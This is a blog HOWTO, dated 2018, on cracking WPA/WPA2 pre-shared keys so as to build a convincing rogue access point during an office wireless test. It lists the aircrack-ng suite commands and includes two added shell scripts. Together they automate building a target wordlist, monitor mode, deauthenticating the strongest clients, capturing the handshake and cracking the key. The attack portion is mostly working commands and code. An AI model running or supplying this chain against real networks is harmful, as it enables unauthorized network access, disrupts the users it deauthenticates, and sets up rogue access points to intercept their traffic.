05 Dec 2018

HOWTO - Cracking WPA/WPA2 pre-shared keys

I was given the opportunity to run some tests against the wireless infrastructure at my office. The actual scenario is to deploy a rogue access point and start gathering intel on the organization. But I decided to take this a step further and do some pre-work to make a convincing rogue AP. What follows is my initial framework that I developed researching how to crack a WPA/WPA2 pre-shared key network. I’ll revisit this and improve on it as I gain more experience.

Goal

The goal of this exercise is to gain the pre-shared key used on the WPA/WPA2 wireless network. This key will be used to set up a realistic looking rogue access point.

Recon

  • Build your word lists for brute forcing
    • Grab some of the password dumps available on the internet
    • OSINT your target(s) to build a list of words and phrases commonly used to build passwords (company, product and location names, family and pet names, important dates like birthdays, favorite places, etc.)
    • Once you determine the target's website(s), use CeWL to harvest possible wordlist entries from them
    • Use cupp (Common User Passwords Profiler) to generate candidates from what you learned about specific people
    • Remove duplicates from your list.
      • sort file > newfile only alpha sorts
      • sort file | uniq > newfile removes exact duplicates (-i also collapses case variants, but a WPA passphrase is case sensitive, so that throws away real candidates)
      • Either way the sort destroys whatever order the list was in, so dedupe before you arrange it.
    • Drop anything shorter than 8 or longer than 63 characters; it cannot be a WPA passphrase and only wastes cracking time.
    • Put anything you think has a higher probability of success near the front of the wordlist; aircrack-ng tries the words in file order, so the good guesses should come first.
    • Use Mentalist to generate alternative/mangled words based on your base word lists.

The word lists you generate can likely be re-used for other bruteforcing attacks against the target.
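The recon steps above, as an added shell example that is not from the original post. It merges the lists best-first so the ordering you chose survives, drops exact duplicates without sorting, and discards anything too short or too long to be a WPA passphrase. The file names are placeholders and the demo words are made up:

```shell
#!/usr/bin/env bash
# build_wordlist.sh: merge the recon lists into one WPA candidate list.
# Added as an example; not from the original post. Inputs are passed best-first
# (OSINT, CeWL and cupp output, then the public dumps); the first occurrence of a
# line wins, duplicates are dropped without sorting so the order survives, and
# anything that cannot be a WPA passphrase (8 to 63 characters) is discarded.
# The file names below are placeholders and the demo words are made up.
set -u

build_wordlist() {
  local out=$1; shift                         # $1 output file, rest = inputs, best first
  cat "$@" \
    | tr -d '\r' \
    | awk 'length($0) >= 8 && length($0) <= 63 && !seen[$0]++' \
    > "$out"
  awk 'END { print NR }' "$out"               # number of candidates written
}

# Constructed sample lists for an offline dry run. Note that "corpwifi2018" is kept
# alongside "CorpWifi2018": WPA passphrases are case sensitive, so uniq -i would
# throw away a real candidate.
demo() {
  local d; d=$(mktemp -d)
  printf 'CorpWifi2018\nshort\nFluffy1999\n' > "$d/osint.txt"
  printf 'password\r\ncorpwifi2018\r\nFluffy1999\r\n123456\r\nCorpWifi2018\r\n' > "$d/dump.txt"
  build_wordlist "$d/merged.txt" "$d/osint.txt" "$d/dump.txt"    # prints 4
  cat "$d/merged.txt"
  rm -rf "$d"
}

case "${1:-}" in
  demo) demo ;;
  "")   ;;                                    # sourced or run without arguments: functions only
  *)    build_wordlist "$@" ;;                # ./build_wordlist.sh merged.txt osint.txt cewl.txt dump.txt
esac
```

Run it as build_wordlist.sh merged.txt osint.txt cewl.txt dump.txt, or with demo for the dry run. Leave case variants in: the passphrase is case sensitive, so uniq -i costs you real candidates, which is why the script only collapses exact duplicates.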

Attack

Get the WPA Authentication

  • Determine the wireless interface chipset/capabilities (if you do not already know). The card and driver must support monitor mode (RFMON); without it none of the capture steps below work.
    • lsusb -vv or lspci -vv to find the card/driver info
    • Or the old standby: open the case and look at the card's labelling.
  • iwconfig to get the interface name (e.g. wlan0)
  • airmon-ng check kill stops NetworkManager and kills the other processes that interfere with monitor mode (wpa_supplicant, dhclient and similar); left running, they reset the interface or hop channels under you. airmon-ng check without kill only lists them.
  • airmon-ng start wlan0 takes the interface down, switches it to monitor mode and brings it back up as wlan0mon.
    • The same can be done by hand with the ip and iw tools, in which case the interface keeps its original name; adjust the interface argument in the commands below accordingly.
  • airodump-ng wlan0mon to survey the available networks. Look for the SSID you know or suspect belongs to the client.
    • Be cautious about neighboring wireless networks you are not authorized to test.
    • airodump-ng --essid [clientssid] wlan0mon narrows the survey if you already know the SSID being used.
    • Once you have found the target, make a note of the BSSID and channel, then hit Ctrl-C to stop the survey.
  • airodump-ng -c [channel] --bssid [target-bssid] -w /path/to/capture/prefix wlan0mon locks the card to the target's channel and writes the capture files. -w takes a prefix, not a file name: the first run writes prefix-01.cap (plus .csv and other formats), and a rerun with the same prefix writes prefix-02.
    • Watch for a bit and make sure this AP is active (on a network with multiple APs, the one you picked might not be the one clients are using).
    • Note the client MACs (STATION column) of a few of the stronger, actively used clients. PWR is in dBm, so -40 is a stronger signal than -70.
    • Leave this terminal open; when airodump-ng captures the 4-way handshake it prints "WPA handshake: [bssid]" in its top-right corner.
  • Open a new terminal to deauth a client and try to catch it re-authenticating.
  • aireplay-ng -0 2 -a [target-bssid] -c [target-client] wlan0mon sends two deauthentication bursts to that client (the interface is a required final argument). Start small; the goal is one reconnect, not an outage.
    • I had problems using -0 10 or higher when trying to grab a client from a multi-AP network on a Cisco wireless controller. There may have been some anti-hacking protections coming into play… need to research.
    • Cross your fingers and hope the client re-authenticates to the same AP.
    • If you do not catch the first client's re-authentication, try a second client or try again. Just try not to be too obvious and cause problems for the client.
  • If you cannot catch the WPA handshake, look at the troubleshooting in Sunny Hoi's post mentioned below.
  • If you successfully catch the WPA handshake, you can shut down the capture with Ctrl-C. Running aircrack-ng on the .cap file without a wordlist lists the networks it found and whether a handshake is present for each, so you can confirm you have it before leaving.
  • To get back on the wireless as a client, stop the monitor interface with airmon-ng and start NetworkManager again (airmon-ng check kill stopped it). A reboot of Kali does the same thing the slow way.

Cracking the WPA Password

  • Pull the capture files down to your cracking machine if it is different from your capture machine (only the .cap file is needed).
  • aircrack-ng -a2 -b [target-bssid] -w /path/to/word/list /path/to/capture-01.cap (-a2 selects WPA/WPA2; -b picks the network if the file holds more than one).
  • Let it churn until it finds the password (or runs out of words). Each guess costs 4096 rounds of PBKDF2-HMAC-SHA1 by design, so a CPU manages on the order of thousands of guesses per second per core, and the order and quality of the wordlist matter far more than its size.
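The capture and cracking steps above combined into one script, as an added example that is not from the original post. It assumes Kali with aircrack-ng 1.2 or later (airmon-ng names the monitor interface wlan0mon and stops NetworkManager, which the script restarts with systemctl); the MAC addresses, file paths and the airodump-ng CSV sample are constructed. Picking the strongest clients out of the CSV and checking for the handshake are the two things the bullet list leaves to eyeballing:

```shell
#!/usr/bin/env bash
# wpa-capture.sh: the capture and cracking steps above as one script.
# Added as an example; not from the original post. Assumes Kali with
# aircrack-ng 1.2 or later, so "airmon-ng start wlan0" creates wlan0mon and
# "airmon-ng check kill" stops NetworkManager (restarted via systemctl below).
# MAC addresses, file names and the CSV sample are constructed placeholders.
set -u

# airmon-ng check kill stops NetworkManager and kills wpa_supplicant/dhclient;
# airmon-ng start then re-creates the interface in monitor mode as <iface>mon.
start_monitor() {
  local iface=$1
  airmon-ng check kill >/dev/null
  airmon-ng start "$iface" >/dev/null
  echo "${iface}mon"
}

# Undo start_monitor without a reboot so the box can join wireless as a client.
stop_monitor() {
  airmon-ng stop "$1" >/dev/null
  systemctl start NetworkManager
}

# Print the N strongest clients of a BSSID from airodump-ng's CSV (prefix-01.csv).
# PWR is dBm, so -40 beats -70; -1 means the driver reported no power and is skipped.
strongest_clients() {
  local csv=$1 bssid=$2 n=${3:-3}
  awk -F', *' -v want="$bssid" '
    /^Station MAC/ { stations = 1; next }       # the station table starts here
    stations && NF >= 6 && toupper($6) == toupper(want) && $4 != "-1" { print $4, $1 }
  ' "$csv" | sort -k1,1nr | head -n "$n" | awk '{ print $2 }'
}

# True once aircrack-ng sees a 4-way handshake for the BSSID in the capture.
# Check this before tearing down; do not leave the site with an empty .cap.
have_handshake() {
  aircrack-ng "$1" </dev/null 2>/dev/null | grep -i "$2" | grep -q 'WPA ([1-9][0-9]* handshake'
}

# Lock to the channel, learn the client list, deauth the strongest clients one at
# a time with small bursts, and stop as soon as a handshake is in the capture.
# Use a fresh prefix per run: airodump-ng appends -01, -02, ... and never overwrites.
capture_handshake() {
  local mon=$1 bssid=$2 chan=$3 prefix=$4 dump client
  airodump-ng -c "$chan" --bssid "$bssid" -w "$prefix" --output-format pcap,csv "$mon" >/dev/null 2>&1 &
  dump=$!
  sleep 15                                    # let airodump-ng populate the station table
  for client in $(strongest_clients "${prefix}-01.csv" "$bssid" 3); do
    aireplay-ng -0 2 -a "$bssid" -c "$client" "$mon" >/dev/null 2>&1
    sleep 20                                  # give the client time to reconnect
    if have_handshake "${prefix}-01.cap" "$bssid"; then
      kill "$dump"; echo "handshake captured after deauthing $client"; return 0
    fi
  done
  kill "$dump"; echo "no handshake yet; retry or pick another client" >&2; return 1
}

# -a2 selects WPA/WPA2, -b picks the network; wordlist order decides how long this takes.
crack_psk() {
  aircrack-ng -a2 -b "$2" -w "$3" "$1"
}

# Constructed airodump-ng CSV (not a real capture) so the parser can be tried offline.
sample_csv() {
  cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:FF, 2018-12-05 10:00:00, 2018-12-05 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  100,  0,  0.  0.  0.  0,  8, CorpWifi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:01, 2018-12-05 10:00:00, 2018-12-05 10:05:00, -70,   20, AA:BB:CC:DD:EE:FF, CorpWifi
00:11:22:33:44:02, 2018-12-05 10:00:00, 2018-12-05 10:05:00, -45,  300, AA:BB:CC:DD:EE:FF, 
00:11:22:33:44:03, 2018-12-05 10:00:00, 2018-12-05 10:05:00, -55,  150, AA:BB:CC:DD:EE:FF, CorpWifi
00:11:22:33:44:04, 2018-12-05 10:00:00, 2018-12-05 10:05:00, -30,   90, 11:22:33:44:55:66, Guest
00:11:22:33:44:05, 2018-12-05 10:00:00, 2018-12-05 10:05:00,  -1,    5, AA:BB:CC:DD:EE:FF, 
EOF
}

case "${1:-}" in
  capture)   # ./wpa-capture.sh capture wlan0 AA:BB:CC:DD:EE:FF 6 /tmp/corp
    mon=$(start_monitor "$2"); capture_handshake "$mon" "$3" "$4" "$5"; stop_monitor "$mon" ;;
  crack)     # ./wpa-capture.sh crack /tmp/corp-01.cap AA:BB:CC:DD:EE:FF wordlist.txt
    crack_psk "$2" "$3" "$4" ;;
  clients)   # ./wpa-capture.sh clients /tmp/corp-01.csv AA:BB:CC:DD:EE:FF 3
    strongest_clients "$2" "$3" "${4:-3}" ;;
  demo)      # offline: strongest two clients from the constructed CSV
    f=$(mktemp); sample_csv > "$f"; strongest_clients "$f" AA:BB:CC:DD:EE:FF 2; rm -f "$f" ;;
  *) ;;      # no subcommand (or sourced): only define the functions
esac
```

The demo subcommand runs the client selection against the constructed CSV with no hardware. The deauth count stays at two per client on purpose, in line with the caution above about larger bursts; if no handshake shows up, rerun with a new prefix rather than flooding the client.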

Wireless interface cards used successfully:

Credit Where Credit is Due